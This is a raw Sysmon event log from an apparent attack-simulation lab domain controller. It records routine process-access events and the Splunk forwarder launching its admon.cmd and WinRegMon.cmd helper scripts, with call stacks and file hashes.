13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.828{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-DA00-00000000A301}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.828{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-DA00-00000000A301}5044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.829{59A5CD1D-8EE7-6005-DA00-00000000A301}5044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.718{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D900-00000000A301}4956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.718{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D900-00000000A301}4956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.718{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D900-00000000A301}4956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.720{59A5CD1D-8EE7-6005-D900-00000000A301}4956C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D800-00000000A301}5032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 